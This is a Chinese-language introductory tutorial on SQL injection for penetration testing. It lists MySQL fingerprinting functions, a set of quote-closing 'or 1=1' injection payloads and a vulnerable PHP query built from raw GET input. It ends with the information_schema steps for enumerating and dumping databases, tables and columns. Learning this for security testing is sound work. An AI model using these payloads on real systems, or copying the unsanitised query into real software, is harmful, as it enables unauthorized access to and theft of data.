渗透测试-SQL注入基础知识

介绍几个常用函数：

1. version()——MySQL 版本

2. user()——数据库用户名

3. database()——数据库名

4. @@datadir——数据库路径

5. @@version_compile_os——操作系统版本

字符串连接函数

1. concat(str1,str2,...)——没有分隔符地连接字符串

2. concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串

3. group_concat(str1,str2,...)——连接一个组的所有字符串，并以逗号分隔每一条数据 ，一般常用这个

        说着比较抽象，其实也并不需要详细了解，知道这三个函数能一次性查出所有信息就行了。

一般尝试的语句

--+可以用#替换，url 提交过程中 Url 编码后的#为%23

or 1=1--+ 
'or 1=1--+ 
"or 1=1--+ 
)or 1=1--+ 
')or 1=1--+ 
") or 1=1--+ 
"))or 1=1--+  

一般查询的代码为：

$id = $_GET['id'];
$sql = "select * from users where id = '$id' limit 0,1";

        此处考虑两个点，一个是闭合前面你的 ‘ 另一个是处理后面的 ‘ ，一般采用两种思 路，闭合后面的引号或者注释掉，注释掉采用--+ 或者 #（%23）

        Mysql 有一个系统数据库 information_schema，存储着所有的数据库的相关信息， 利用该表information_schema可以进行一次完整的注入，以下是一般流程

1、查询该数据库上存在的数据库
SELECT SCHEMA_NAME FROM information_schema.schemata;

2、猜某数据库的的数据表
SELECT TABLE_NAME FROM information_schema.tables	WHERE TABLE_SCHEMA = "security";

3、猜某表的所有列
SELECT COLUMN_NAME FROM information_schema.columns WHERE TABLE_NAME = 'emails';

4、获取某列的数据
SELECT * FROM security.`emails`;